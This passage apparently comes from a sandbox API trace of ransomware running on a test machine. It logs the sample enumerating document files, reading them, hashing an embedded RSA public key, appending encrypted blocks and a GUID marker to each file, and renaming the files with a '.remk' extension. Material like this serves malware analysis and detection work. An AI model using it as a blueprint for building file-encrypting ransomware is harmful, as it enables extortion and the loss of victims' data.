KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.154] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0235.155] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.155] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.155] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.155] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.155] GetLastError () returned 0x0 [0235.155] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.155] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0235.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.156] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.156] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.156] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.156] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.157] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd325, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.157] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.157] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.157] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.157] CloseHandle (hObject=0x640) returned 1 [0235.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x325d3b0 [0235.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0235.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\9bzSIvv8A.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\9bzsivv8a.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\9bzSIvv8A.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\9bzsivv8a.xlsx.remk")) returned 1 [0235.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0235.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.160] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0235.162] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0ab9b0, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x56a8bb10, ftLastAccessTime.dwHighDateTime=0x1d5de0c, ftLastWriteTime.dwLowDateTime=0x56a8bb10, ftLastWriteTime.dwHighDateTime=0x1d5de0c, nFileSizeHigh=0x0, nFileSizeLow=0x5384, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BokYvvAfU.ppt", cAlternateFileName="BOKYVV~1.PPT")) returned 1 [0235.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.162] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\BokYvvAfU.ppt") returned=".ppt" [0235.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\BokYvvAfU.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\bokyvvafu.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.163] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=21380) returned 1 [0235.164] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.166] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x535e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.166] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.168] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.169] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x5384, lpOverlapped=0x0) returned 1 [0235.169] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.170] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0235.171] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.171] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.171] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.171] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.171] GetLastError () returned 0x0 [0235.171] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.171] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0235.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.171] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.171] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.171] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5380) returned 0x37c4278 [0235.172] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c920 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c968 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea30 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9e8 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.172] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0235.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9e8 | out: hHeap=0x630000) returned 1 [0235.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea30 | out: hHeap=0x630000) returned 1 [0235.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea30 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9e8 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee9d0 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9e8 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea30 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.174] GetCurrentThreadId () returned 0x314 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3f40 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.174] GetCurrentThreadId () returned 0x314 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea30 [0235.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9e8 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea48 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea18 [0235.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea00 [0235.177] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5384, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.177] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.177] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.177] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.177] CloseHandle (hObject=0x640) returned 1 [0235.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b0 [0235.179] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\BokYvvAfU.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\bokyvvafu.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\BokYvvAfU.ppt.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\bokyvvafu.ppt.remk")) returned 1 [0235.181] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5926250, ftCreationTime.dwHighDateTime=0x1d5e0ee, ftLastAccessTime.dwLowDateTime=0xa1b470b0, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0xa1b470b0, ftLastWriteTime.dwHighDateTime=0x1d5e1f2, nFileSizeHigh=0x0, nFileSizeLow=0x17f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cbSmrZ3jMzQOa6ad6 s.xls", cAlternateFileName="CBSMRZ~1.XLS")) returned 1 [0235.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.181] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\cbSmrZ3jMzQOa6ad6 s.xls") returned=".xls" [0235.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\cbSmrZ3jMzQOa6ad6 s.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\cbsmrz3jmzqoa6ad6 s.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.182] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=98069) returned 1 [0235.182] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.184] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17eef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.185] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.191] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, 